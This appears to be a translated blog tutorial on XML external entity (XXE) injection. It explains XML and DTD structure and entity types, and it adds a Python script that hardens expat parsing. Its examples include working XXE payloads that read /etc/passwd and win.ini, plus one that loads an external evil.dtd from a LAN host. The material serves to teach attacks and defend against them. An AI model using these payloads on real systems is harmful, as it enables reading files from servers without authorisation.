XXE (XML external entity injection) vulnerability: basic knowledge

Basic knowledge

There is a lot to digest here and the concepts are a bit confusing. The basic structure, the payload and external files are mostly understood; the other principles still need to be learned.

Lab environment

In libxml 2.9.1 and later, external entities are not resolved by default. The tests used PHP 5.2 (libxml 2.7.7) and PHP 5.3 (libxml 2.7.8) on Windows. On Linux you need to build PHP against a libxml version lower than 2.9.1. Use phpinfo() to check which libxml version is in use.

Definition

XML is a markup language for giving electronic documents a structure; it can be used to mark up data and to define data types. It is a meta-language (a "source language") that lets users define their own markup languages.

		XML document structure
			includes the XML declaration
			the DTD (document type definition, optional)
			the document elements

XML document structure

		<?xml version="1.0" encoding="UTF-8"?>  // XML declaration: version and encoding (the original example used encoding="gb2312")
		<!DOCTYPE root SYSTEM "http://www.XXXX.com/file" [  // defines the DTD; format: root gives the root node name, SYSTEM declares the path of the external DTD file to use, followed by the file URL; note that the internal subset is wrapped in []
		<!ELEMENT root (other)>  // element declaration: declares the elements the XML contains, giving each element's name (root, other, ...) and its category/content
		<!ELEMENT to (#PCDATA)>  // declares the to element as type #PCDATA
		<!ENTITY generalentity "content">  // the ENTITY tag declares an entity. An entity is "a variable used to define a shortcut for a reference to ordinary text or special characters": a variable defined in the DTD that the XML parser substitutes for each reference while parsing. Entities are predefined entities, general entities or parameter entities; here a general entity generalentity with the content "content" is defined
		<!ENTITY % extendentity SYSTEM "http://www.XXXX.com/file">  // defines a parameter entity; the format is <!ENTITY % parameter-name parameter-content>
		]>

Reference format: %parameter-name;

Parameter entities can only be referenced inside a DTD. In an internal DTD subset a parameter-entity reference may only appear where a DTD markup declaration may appear (between declarations, not inside one). In an external DTD file a parameter-entity reference may also appear inside the content of a declaration, for example:

<!ENTITY % outer "%another;">  // hypothetical names; a reference inside a declaration's content is only allowed in an external DTD
		%extendentity;  // reference the external parameter entity declared above

Basic knowledge of DTD

A Document Type Definition (DTD) defines semantic constraints for an XML document.
It can be embedded in the XML document (internal declaration) or kept in a separate file (external reference). Because the data types it supports are limited, it cannot specify the content of elements or attributes in detail; its extensibility is not comparable to XML Schema.
Reference link: http://www.w3school.com.cn/dtd/index.asp

Basic PAYLOAD structure

	The document starts with the XML declaration:
<?xml version="1.0" encoding="UTF-8"?>
	Then the DTD declares an entity (here using the file protocol):
<!DOCTYPE foo [
			<!ELEMENT foo ANY>
			<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
	Finally the XML references the entity to obtain its data:
<foo>&xxe;</foo>

Attack methods using DTD entities

	DTD reference methods (brief overview)
		1. Internal DTD declaration
			<!DOCTYPE root-element [element declarations]>
		2. External DTD reference
			<!DOCTYPE root-element-name SYSTEM "URI of the external DTD">
		3. Reference to a public DTD
			<!DOCTYPE root-element-name PUBLIC "DTD identifier" "URI of the public DTD">
	Example
<?xml version="1.0"?>
<!DOCTYPE configuration PUBLIC "-//mybatis.org//DTD Config 3.0//EN" "http://mybatis.org/dtd/mybatis-3-config.dtd">

Naming convention:

It starts with !DOCTYPE; configuration is the name of the document's root element;
PUBLIC means a public DTD;
- means a non-ISO organization;
mybatis.org is the organization;
DTD is the type;
Config is the label;
3.0 is the version number attached to the label;
EN means the language of the DTD is English;
finally comes the URL of the DTD.

DTD entity declaration

Internal entity declaration

<!ENTITY entity-name "entity value">
			An entity reference consists of three parts: the & symbol, the entity name and a semicolon (;). Whether the request is sent by GET or by POST, the & must be URL-encoded, because the parameters are passed into the XML and an unencoded & would be treated as the separator between parameters. Example:

	<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY xxe "oldboyedu.com">]>
<foo>&xxe;</foo>

External entity declaration

<!ENTITY entity-name SYSTEM "URI/URL">
			External references support protocols such as http and file. The protocols supported differ from language to language, but some are common to all; the details are as follows.

					Example
		<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >]>
<foo>&xxe;</foo>

Parameter entity declaration

<!ENTITY % entity-name "entity value">

or

<!ENTITY % entity-name SYSTEM "URI">
			Example
		<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "http://192.168.0.105:8080/evil.dtd" >
%xxe;]>
<foo>&evil;</foo>
					Contents of the external evil.dtd
<!ENTITY evil SYSTEM "file:///c:/windows/win.ini" >

Reference to a public entity

<!ENTITY entity-name PUBLIC "public_ID" "URI">
			Example
	<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY % xxe PUBLIC "public_ID" "http://192.168.0.105:8080/evil.dtd" >
%xxe;]>
<foo>&evil;</foo>
					Contents of the external evil.dtd
<!ENTITY evil SYSTEM "file:///c:/windows/win.ini" >
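Every payload shape above (internal entity, external SYSTEM entity, parameter entity pulling in an external DTD) is decided by how the parser treats the DTD, so the defence lives in the parser configuration. The following Python script is an added example, not code from the original post; it uses only the standard library's expat bindings and constructed sample documents modelled on the post's payloads (the DTD host name is a placeholder). It shows the two controls a defender wants: refuse any DOCTYPE for untrusted input, and, where DTDs must be accepted, refuse to resolve external entities while still expanding harmless internal ones. The names parse_hardened, classify, ParseAudit and the exception classes are my own.

```python
"""Hardened XML parsing with the standard-library expat bindings.

Added example, not code from the original post.  Two controls are shown:
  1. refuse any DOCTYPE (no DTD, so no entity declaration is ever processed);
  2. if a DTD must be accepted, refuse to resolve external entities while
     still expanding ordinary internal entities.
The sample documents are constructed here in the shapes used by the post.
"""
import xml.parsers.expat as expat


class DtdRejected(Exception):
    """The document carries a DOCTYPE but DTDs are not allowed."""


class ExternalEntityBlocked(Exception):
    """An external (SYSTEM/PUBLIC) entity was referenced; resolution refused."""


class ParseAudit:
    """What the parser observed, for logging or triage."""

    def __init__(self):
        self.entities = []  # (name, is_parameter_entity, system_id)
        self.text = []      # character data, including internal-entity expansions


def parse_hardened(xml_text, allow_dtd=False):
    """Parse xml_text and return a ParseAudit.

    allow_dtd=False (the default, recommended for untrusted input) raises
    DtdRejected as soon as a DOCTYPE is seen, before any entity is declared.
    allow_dtd=True processes the DTD but raises ExternalEntityBlocked the
    moment expat asks for an external entity, so no file or URL is ever opened.
    """
    audit = ParseAudit()
    parser = expat.ParserCreate()

    def start_doctype(name, system_id, public_id, has_internal_subset):
        if not allow_dtd:
            raise DtdRejected(f"DOCTYPE {name!r} not permitted")

    def entity_decl(name, is_param, value, base, system_id, public_id, notation):
        audit.entities.append((name, bool(is_param), system_id))

    def external_entity_ref(context, base, system_id, public_id):
        # expat calls this instead of fetching the entity; raising aborts the parse.
        raise ExternalEntityBlocked(f"refused external entity {system_id!r}")

    parser.StartDoctypeDeclHandler = start_doctype
    parser.EntityDeclHandler = entity_decl
    parser.ExternalEntityRefHandler = external_entity_ref
    parser.CharacterDataHandler = audit.text.append
    parser.Parse(xml_text, True)
    return audit


def classify(xml_text):
    """Verdict for one document: "ok", "dtd-internal-only",
    "external-entity-declared", "external-entity-blocked" or "parse-error"."""
    try:
        parse_hardened(xml_text, allow_dtd=False)
        return "ok"
    except DtdRejected:
        pass  # a DTD is present; look closer with the second control
    try:
        audit = parse_hardened(xml_text, allow_dtd=True)
    except ExternalEntityBlocked:
        return "external-entity-blocked"
    except expat.ExpatError:
        return "parse-error"
    if any(system_id for _, _, system_id in audit.entities):
        return "external-entity-declared"  # declared but never referenced
    return "dtd-internal-only"


# Constructed samples (the DTD host is a placeholder, not a real server).
PLAIN_DOC = '<?xml version="1.0"?><foo>hello</foo>'
INTERNAL_ENTITY_DOC = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe "oldboyedu.com">]>'
    '<foo>&xxe;</foo>'
)
EXTERNAL_ENTITY_DOC = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE foo [<!ELEMENT foo ANY >'
    '<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >]>'
    '<foo>&xxe;</foo>'
)
PARAM_ENTITY_DOC = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE foo [<!ELEMENT foo ANY >'
    '<!ENTITY % xxe SYSTEM "http://dtd-host.example/evil.dtd" >'
    '%xxe;]>'
    '<foo>&evil;</foo>'
)

if __name__ == "__main__":
    for label, doc in [("plain", PLAIN_DOC), ("internal", INTERNAL_ENTITY_DOC),
                       ("external", EXTERNAL_ENTITY_DOC), ("parameter", PARAM_ENTITY_DOC)]:
        print(f"{label:10s} {classify(doc)}")
```

Running the script prints one verdict per sample; the same classify() verdicts can be written as a log field so that documents carrying a DTD stand out in detection. Note that the file and http URIs are never opened: expat hands the system identifier to the handler, and the handler raises before any I/O happens. For the PHP setup described in the lab environment, the equivalent of the allow_dtd=False default is to reject any DOCTYPE in the input, and on libxml versions that still resolve entities by default to call libxml_disable_entity_loader(true) (deprecated in PHP 8.0, where loading is already off) before the document is loaded.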

Entity categories

	Built-in entities
	Character entities
	General entities
	Parameter entities
		declared with % entity-name and also referenced as %entity-name;
			can only be declared in the DTD and referenced in the DTD

Examples

		Internal entity
<!ENTITY entity-name "entity content">
		External entity
<!ENTITY entity-name SYSTEM "URI">
		Parameter entity
<!ENTITY % entity-name "entity content">

or

<!ENTITY % entity-name SYSTEM "URI">

Note: parameter entities are referenced inside the DTD, whereas the other entities are referenced in the XML document. A parameter entity is declared with % entity-name and referenced as %entity-name;; it can only be declared in the DTD and referenced there.


Origin blog.csdn.net/weixin_43079958/article/details/105476366